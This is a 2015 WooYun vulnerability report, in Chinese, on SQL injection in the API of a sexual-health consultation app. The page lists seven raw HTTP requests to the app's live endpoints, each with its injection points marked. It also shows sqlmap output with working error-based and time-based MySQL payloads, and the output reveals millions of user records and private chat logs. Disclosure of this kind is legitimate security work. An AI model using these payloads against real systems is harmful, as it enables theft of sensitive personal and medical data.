当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108610

漏洞标题:两性私人医生超级SQL大礼包用户信息和聊天记录信息一览无余

相关厂商:ranknowcn.com

漏洞作者: 路人甲

提交时间:2015-04-17 18:40

修复时间:2015-04-22 18:42

公开时间:2015-04-22 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-17: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

312万用户信息,2122万聊天记录。吊炸天!还有合同信息!!!

详细说明:

礼包如下:

1.
POST /api/m.php?randnum=0.3436146208550781 HTTP/1.1
Content-Length: 307
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=chatend&chatid=(*)
2.
POST /api/m.php?randnum=0.404921563109383 HTTP/1.1
Content-Length: 355
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&password=(*)&username=(*)
3.
POST /api/m.php?randnum=0.07986594829708338 HTTP/1.1
Content-Length: 341
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=logout&userid=(*)
4.
POST /client/api.php?randnum=0.30327599309384823 HTTP/1.1
Content-Length: 418
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=chatnow&doctorid=(*)&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
5.POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&number=(*)&ver=1.3
6.
POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 359
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&number=e&password=(*)&ver=1.3
7.
http://medapp.ranknowcn.com/client/image.php?key=(*)

漏洞证明:

2.png


---
Parameter: key (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: key=' AND (SELECT 4808 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(4808=4808,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AYzU'='AYzU
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: key=' AND (SELECT * FROM (SELECT(SLEEP(5)))eThy) AND 'AyNZ'='AyNZ
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL >= 5.0.0
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp
Database: lucky_draw
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| quotaQuestionSearch_static    | 8409865 |
| quotaQuestionSearch_static2   | 1668219 |
| question_bak_20140826         | 984870  |
| chat_bak_20140826             | 914996  |
| answer_bak_20140826           | 913774  |
| `360search_sendurl_log`       | 209444  |
| hospitalSellLog_updLog_bak1   | 131155  |
| sellLog                       | 82301   | ----------------->日志
| sellLog_bak2                  | 82110   |
| sellLog_bak1                  | 74940   |
| searchHospital_keshi          | 67054   |
| hospitalSellLog_invalidChat   | 36319   |
| hetong                        | 3265    |
| searchHospital_hospital       | 2771    |
Database: medapp
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| chathistory                  | 21220288 |  --------->2122万聊天记录
| chatsourceLog                | 18372907 |
| userAddrdetail               | 15648638 |
| jihuo                        | 12418129 |
| iospush                      | 12005034 |
| userVisitLog                 | 9016552 |
| ios_xyz                      | 5330339 |
| record                       | 5000392 |
| ios_xyz2                     | 4968693 |
| ios_xyz2_copy2               | 4961188 |
| quotaQuestionSearch          | 4727017 |
| userDeviceid                 | 3822977 |
| logs_question                | 3231583 |
| `user`                       | 3126644 | --------------->312万用户
| question                     | 2665491 |
| question_all                 | 2571617 |
| chat                         | 2487796 |
| answer                       | 2485376 |
| logs_doctorlogin             | 2243382 |
| ios_xyz2_copy                | 1313491 |
| addrdetailLog                | 1159968 |
| questionCountForDate         | 734583  |
| logs_users                   | 656968  |
| temp_questions               | 617653  |
| jihuo_macaddr                | 590965  |
| hospitalSellLog_updLog       | 558268  |
| gps_raw_data                 | 499429  |
| gps_cell                     | 365384  |
| gps_wifi                     | 342661  |
| iptable                      | 300132  |
| userAlias                    | 262960  |
| bj_base_station              | 250502  |
| chatcomment                  | 236696  |
| chatclose                    | 224087  |
| chatchange                   | 161348  |
| chatUpdLog                   | 142630  |
| meiapp_mm_vote               | 122459  |
| gps_pos                      | 117181  |
| quotaQuestion_test           | 113152  |
| question_repeatLog           | 105996  |
| uploadFile                   | 89077   |
| ios_xyz2_copy1               | 88297   |
| quotaQuestion                | 86733   |
| publicQuestion               | 82896   |
| userLeaveWords               | 71036   |
| jihuoCountForDate            | 69885   |
| cityhospital_keshi           | 67054   |
| user_copy                    | 45704   |
| iospushmsg                   | 43265   |
| booking                      | 39305   |
| logs_hospital                | 34670   |
| meiapp_news                  | 30347   |
还有些敏感信息不贴出来了。

修复方案:

吊炸天,紧急修复!
求 20 rank !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-22 18:42

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-04-22:多谢。由于最近发的漏洞太多,错过了,确认有点晚。